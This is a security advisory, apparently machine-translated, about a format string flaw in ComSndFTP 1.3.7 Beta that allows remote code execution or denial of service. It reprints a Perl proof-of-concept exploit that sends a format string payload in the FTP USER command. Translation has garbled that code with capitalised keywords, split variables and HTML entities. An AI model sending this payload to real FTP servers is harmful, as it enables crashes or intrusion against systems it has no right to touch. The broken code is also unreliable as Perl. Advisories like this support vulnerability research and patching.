ComSndFTP Server Format String Vulnerability

Release date:
Updated on:

Affected Systems:
ComSndFTP 1.3.7 Beta
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53865

ComSndFTP is a Windows FTP server.

ComSndFTP 1.3.7 Beta has the format string vulnerability. Remote attackers can exploit this vulnerability to execute arbitrary code or cause DOS.

<* Source: demonalex

Link: http://www.securityfocus.com/archive/1/523019
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/perl-w
# ComSndFTP Server Remote Format String Overflow Exploit
# Written by demonalex (at) 163 (dot) com [email concealed]
Use IO: Socket;
$ | = 1;
$ Host = shift | die "$0 \ $ host \ $ port \ n ";
$ Port = shift | die "$0 \ $ host \ $ port \ n ";
$ Edevil = '% s % p % x % d ';
Print "Launch Attack ...";
$ Sock1 = IO: Socket: INET-> new (PeerAddr => $ host, PeerPort => $ port, Proto => 'tcp ', Timeout => 30) | die "HOST $ host PORT $ port is down! \ N ";
If (defined ($ sock1 )){
$ Sock1-& gt; recv ($ content, 100, 0 );
Sleep (2 );
$ Sock1-> send ("USER". $ edevil. "\ r \ n", 0 );
Sleep (2 );
$ Sock1-& gt; recv ($ content, 100, 0 );
Sleep (5 );
$ Sock1-> close;
}
Print "Finish! \ N ";
Exit (1 );

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

ComSndFTP
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://ftp.comsnd.com/